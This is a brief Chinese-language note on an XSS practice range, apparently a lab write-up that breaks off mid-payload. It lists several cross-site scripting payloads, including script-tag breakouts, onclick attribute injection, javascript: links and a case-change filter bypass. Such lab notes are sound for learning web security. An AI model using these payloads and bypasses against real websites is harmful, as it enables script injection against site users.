xss靶场笔记

1.构造xss直接过 : 2."><script>alert(1)</script>发现对 html 特殊符号进行了实体编码: 3.1' onclick=alert(1)//鼠标经过触发 : 4. 1' onclick=alert(1)//鼠标经过触发: 5. "><a href=javascript:alert(/xss/)>xss</a>: 6. 大小写绕过"><a Href=javascri
相关文章
相关标签/搜索